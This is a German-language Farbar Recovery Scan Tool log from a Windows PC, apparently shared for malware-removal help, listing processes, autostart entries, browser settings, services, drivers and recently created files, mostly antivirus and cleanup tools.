(Malwarebytes) C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamscheduler.exe
(Malwarebytes) C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe
(Copyright 2013 SAMSUNG) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
(Copyright 2013 SAMSUNG) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Malwarebytes) C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbam.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation) C:\Windows\System32\igfxTray.exe
(Adobe Systems Incorporated) C:\Program Files\Adobe\Elements 13 Organizer\PhotoshopElementsFileAgent.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Atheros Communications) C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13449288 2013-03-26] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1278024 2013-03-08] (Realtek Semiconductor)
HKLM\...\Run: [Samsung Link] => C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe [600928 2014-03-13] (Copyright 2013 SAMSUNG)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation)
HKLM-x32\...\Run: [Nikon Message Center 2] => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe [619008 2010-05-25] (Nikon Corporation)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2694040 2014-07-03] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SunJavaUpdateSched] => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [807392 2016-03-21] (Avira Operations GmbH & Co. KG)
HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe [132224 2013-02-28] (Atheros Communications)
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [718208 2010-03-16] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] ()

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{CDCF1B09-7464-4C3E-A16A-C67E31D926EC}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/?pc=MSE1
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=130926929970896047&GUID=91D7EFA7-E23E-4872-8361-CEB8ED36209E
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM-x32 -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-1569062512-718196537-2772323438-1001 -> DefaultScope {8CB5941F-AEB6-4B8B-956E-95EBED73E3FE} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
SearchScopes: HKU\S-1-5-21-1569062512-718196537-2772323438-1001 -> {8CB5941F-AEB6-4B8B-956E-95EBED73E3FE} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1
FF Homepage: hxxp://www.google.de/
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect_x86_64 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2014-07-03] (Adobe Systems)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-02-18] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-02-18] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-10-23] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-10-23] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-14] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2014-07-03] (Adobe Systems)
FF Extension: Default - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi [2016-03-16] [ist nicht signiert]

Chrome:
=======
CHR dev: Chrome dev build erkannt! <======= ACHTUNG
CHR Profile: C:\Users\Denny\AppData\Local\Google\Chrome\User Data\Default
StartMenuInternet: Google Chrome - chrome.exe

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AdobeActiveFileMonitor13.0; C:\Program Files\Adobe\Elements 13 Organizer\PhotoshopElementsFileAgent.exe [231120 2014-08-31] (Adobe Systems Incorporated)
S2 AntiVirMailService; C:\Program Files (x86)\Avira\AntiVir Desktop\avmailc7.exe [955736 2016-03-21] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [466504 2016-03-21] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [466504 2016-03-21] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\AntiVir Desktop\avwebg7.exe [1424880 2016-03-21] (Avira Operations GmbH & Co. KG)
R2 AtherosSvc; C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\adminservice.exe [227968 2013-02-28] (Qualcomm Atheros Commnucations) [Datei ist nicht signiert]
R2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Portal\CCDMonitorService.exe [2797312 2013-12-04] (Acer Incorporated)
S3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [660040 2013-01-18] (Acer Incorporated)
R2 EpsonCustomerResearchParticipation; C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe [676336 2015-09-03] (SEIKO EPSON CORPORATION)
R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [135824 2011-12-12] (Seiko Epson Corporation)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [319376 2014-10-01] (Intel Corporation)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [128896 2013-02-18] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2013-02-18] (Intel Corporation)
R2 LMSvc; C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe [431656 2013-03-15] (Acer Incorporate)
R2 MBAMScheduler; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes)
R2 MBAMService; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [1136608 2016-03-10] (Malwarebytes)
R2 Samsung Link Service; C:\Program Files\Samsung\Samsung Link\Samsung Link.exe [609632 2014-03-13] (Copyright 2013 SAMSUNG)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [128664 2016-03-21] (Avira Operations GmbH & Co. KG) R1 avipbb; C:\Windows\system32\DRIVERS\avipbb.sys [137952 2016-03-21] (Avira Operations GmbH & Co. KG) R1 avkmgr; C:\Windows\system32\DRIVERS\avkmgr.sys [35488 2016-03-21] (Avira Operations GmbH & Co. KG) R2 avnetflt; C:\Windows\system32\DRIVERS\avnetflt.sys [68936 2016-03-21] (Avira Operations GmbH & Co. KG) S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [77464 2013-02-28] (Qualcomm Atheros) S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation) R3 LMDriver; C:\Windows\System32\drivers\LMDriver.sys [21360 2013-01-10] (Acer Incorporated) R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes) R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-03-29] (Malwarebytes) R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [65408 2016-03-10] (Malwarebytes Corporation) R0 PxHlpa64; C:\Windows\System32\drivers\PxHlpa64.sys [56336 2013-09-03] (Corel Corporation) S3 QRDCIO; C:\Windows\System32\drivers\QRDCIO.sys [9728 2009-10-20] (QUANTA) R3 RadioShim; C:\Windows\System32\drivers\RadioShim.sys [15704 2013-01-10] (Acer Incorporated) R3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [455240 2013-03-05] (RTS Corporation) S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation) R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation) R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation) ==================== NetSvcs (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) 
==================== Ein Monat: Erstellte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2016-03-29 19:05 - 2016-03-29 19:06 - 00015408 _____ C:\Users\Denny\Desktop\FRST.txt 2016-03-29 18:17 - 2016-03-29 18:18 - 03102208 _____ C:\Users\Denny\Desktop\AdwCleaner_5.107.exe 2016-03-29 18:14 - 2016-03-29 18:14 - 00001192 _____ C:\Users\Denny\Desktop\mbam.txt 2016-03-29 16:48 - 2016-03-29 18:49 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys 2016-03-29 16:48 - 2016-03-29 18:20 - 00001072 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk 2016-03-29 16:48 - 2016-03-29 16:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 2016-03-29 16:48 - 2016-03-29 16:48 - 00000000 ____D C:\ProgramData\Malwarebytes 2016-03-29 16:48 - 2016-03-29 16:48 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware 2016-03-29 16:48 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys 2016-03-29 16:48 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys 2016-03-29 16:48 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys 2016-03-29 16:43 - 2016-03-29 16:47 - 22851472 _____ (Malwarebytes ) C:\Users\Denny\Downloads\mbam-setup-2.2.1.1043.exe 2016-03-29 16:34 - 2016-03-29 16:37 - 00020251 _____ C:\Users\Denny\Desktop\Fixlog.txt 2016-03-29 12:52 - 2016-03-29 13:00 - 00231358 _____ C:\TDSSKiller.3.1.0.9_29.03.2016_12.52.00_log.txt 2016-03-29 12:50 - 2016-03-29 12:51 - 00008896 _____ C:\TDSSKiller.3.1.0.9_29.03.2016_12.50.27_log.txt 2016-03-29 12:49 - 2016-03-29 12:50 - 04727984 _____ (Kaspersky Lab ZAO) C:\Users\Denny\Desktop\tdsskiller.exe 2016-03-29 12:45 - 2016-03-29 12:45 - 00000144 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat 2016-03-28 23:46 - 2016-03-29 16:41 - 00000000 ____D 
C:\Users\Denny\Desktop\Infos 2016-03-28 23:36 - 2016-03-28 23:37 - 00031180 _____ C:\Users\Denny\Downloads\Addition.txt 2016-03-28 23:34 - 2016-03-29 19:05 - 00000000 ____D C:\FRST 2016-03-28 23:34 - 2016-03-28 23:37 - 00051376 _____ C:\Users\Denny\Downloads\FRST.txt 2016-03-28 23:33 - 2016-03-28 23:33 - 02374144 _____ (Farbar) C:\Users\Denny\Desktop\FRST64.exe 2016-03-28 23:32 - 2016-03-28 23:32 - 01725440 _____ (Farbar) C:\Users\Denny\Downloads\FRST.exe 2016-03-28 23:18 - 2016-03-28 23:28 - 00003594 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1569062512-718196537-2772323438-500 2016-03-28 23:18 - 2016-03-28 23:18 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Avira 2016-03-28 23:10 - 2016-03-28 23:24 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Local\Packages 2016-03-28 23:10 - 2016-03-28 23:10 - 00001454 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2016-03-28 23:10 - 2016-03-28 23:10 - 00000020 ___SH C:\Users\Administrator.Schneider\ntuser.ini 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Vorlagen 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Startmenü 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Netzwerkumgebung 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Lokale Einstellungen 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Eigene Dateien 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Druckumgebung 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Videos 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Musik 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL 
C:\Users\Administrator.Schneider\Documents\Eigene Bilder 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programme 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Local\Verlauf 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Local\Anwendungsdaten 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Anwendungsdaten 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 __SHD C:\Users\Administrator\IntelGraphicsProfiles 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Adobe 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 ____D C:\Users\Administrator.Schneider 2016-03-28 23:10 - 2014-03-29 08:08 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Macromedia 2016-03-28 23:10 - 2014-02-22 06:37 - 00000369 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk 2016-03-28 23:10 - 2014-02-22 06:37 - 00000369 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk 2016-03-22 02:54 - 2016-03-22 02:54 - 01610352 _____ (Malwarebytes) C:\Users\Denny\Downloads\JRT.exe 2016-03-22 00:31 - 2016-03-22 00:31 - 01474568 _____ C:\Users\Denny\Downloads\BitDefender Adware Removal Tool - CHIP-Installer.exe 2016-03-22 00:21 - 2016-03-29 18:20 - 00001123 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk 2016-03-22 00:21 - 2016-03-29 18:20 - 00001117 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk 2016-03-22 00:21 - 2016-03-22 00:21 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2016-03-21 23:58 - 2016-03-21 23:58 - 00242376 _____ C:\Users\Denny\Downloads\Firefox Setup Stub 45.0.1.exe 2016-03-21 23:26 - 2016-02-20 17:45 - 01373184 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\appraiser.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 01168896 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00696832 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00689152 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll 2016-03-21 23:26 - 2016-02-05 21:06 - 00046768 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe 2016-03-21 23:26 - 2016-01-24 20:19 - 00419160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys 2016-03-21 23:26 - 2016-01-24 20:19 - 00378712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys 2016-03-21 23:26 - 2016-01-24 20:19 - 00331608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys 2016-03-21 23:26 - 2016-01-24 13:57 - 01335296 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll 2016-03-21 23:26 - 2016-01-24 13:45 - 01063424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll 2016-03-21 23:26 - 2016-01-09 03:38 - 00091992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbehci.sys 2016-03-21 23:26 - 2016-01-06 20:25 - 00416768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys 2016-03-21 23:26 - 2015-12-30 23:53 - 02017624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys 2016-03-21 23:23 - 2016-02-06 18:58 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll 2016-03-21 23:23 - 2016-02-06 18:32 - 00801792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll 2016-03-21 23:23 - 2016-01-10 18:41 - 01707008 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll 2016-03-21 23:23 - 2016-01-10 18:31 - 01344512 _____ 
(Microsoft Corporation) C:\WINDOWS\SysWOW64\comsvcs.dll 2016-03-21 23:23 - 2016-01-09 03:49 - 00218448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rsaenh.dll 2016-03-21 23:23 - 2016-01-09 03:49 - 00192120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rsaenh.dll 2016-03-21 23:23 - 2016-01-07 01:46 - 00148752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscapi.dll 2016-03-21 23:23 - 2016-01-07 01:45 - 00177712 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscapi.dll 2016-03-21 23:23 - 2016-01-06 18:47 - 00146944 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscsvc.dll 2016-03-21 23:23 - 2015-12-30 22:49 - 00470360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys 2016-03-21 23:23 - 2015-12-20 16:57 - 00839168 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll 2016-03-21 23:23 - 2015-12-20 16:43 - 00696320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll 2016-03-21 23:23 - 2015-11-19 16:33 - 00994760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll 2016-03-21 23:23 - 2015-11-19 16:26 - 00922432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll 2016-03-21 22:54 - 2016-03-29 18:39 - 00000000 ____D C:\AdwCleaner 2016-03-21 22:27 - 2016-03-21 22:36 - 00000000 ____D C:\Users\Denny\Desktop\Pferd 2016-03-21 18:50 - 2016-03-21 18:50 - 600300950 _____ C:\WINDOWS\MEMORY.DMP 2016-03-21 18:50 - 2016-03-21 18:50 - 00284928 _____ C:\WINDOWS\Minidump\032116-30421-01.dmp 2016-03-21 18:44 - 2016-01-15 18:56 - 02487296 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll 2016-03-21 18:44 - 2016-01-15 18:45 - 01482240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll 2016-03-21 18:44 - 2016-01-05 17:00 - 00570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe 2016-03-21 18:44 - 2015-12-20 16:56 - 00616960 _____ (Microsoft Corporation) C:\WINDOWS\system32\msra.exe 2016-03-21 18:37 - 2016-03-29 18:20 - 00001192 _____ C:\Users\Public\Desktop\Avira 
Antivirus.lnk 2016-03-21 18:37 - 2016-03-21 18:37 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira 2016-03-21 18:15 - 2016-03-21 18:15 - 00000000 ____D C:\Users\Denny\AppData\Local\app 2016-03-21 18:14 - 2016-03-21 18:43 - 00000000 ____D C:\Users\Denny\AppData\Roaming\Avira 2016-03-21 18:07 - 2016-03-21 18:35 - 00000000 ____D C:\ProgramData\Avira 2016-03-21 18:07 - 2016-03-21 18:34 - 00137952 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avipbb.sys 2016-03-21 18:07 - 2016-03-21 18:34 - 00128664 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avgntflt.sys 2016-03-21 18:07 - 2016-03-21 18:34 - 00068936 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avnetflt.sys 2016-03-21 18:07 - 2016-03-21 18:34 - 00035488 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avkmgr.sys 2016-03-21 18:07 - 2016-03-21 18:07 - 00000000 ____D C:\Program Files (x86)\Avira 2016-03-21 17:38 - 2016-03-08 09:00 - 00829944 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2016-03-21 17:38 - 2016-03-08 09:00 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2016-03-21 16:28 - 2016-02-12 21:14 - 00136904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe 2016-03-21 16:28 - 2016-02-12 17:14 - 03708416 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2016-03-21 16:28 - 2016-02-12 16:55 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll 2016-03-21 16:28 - 2016-02-12 16:54 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll 2016-03-21 16:28 - 2016-02-12 16:54 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll 2016-03-21 16:28 - 2016-02-12 16:54 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe 2016-03-21 16:28 - 2016-02-12 16:51 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll 2016-03-21 16:28 - 
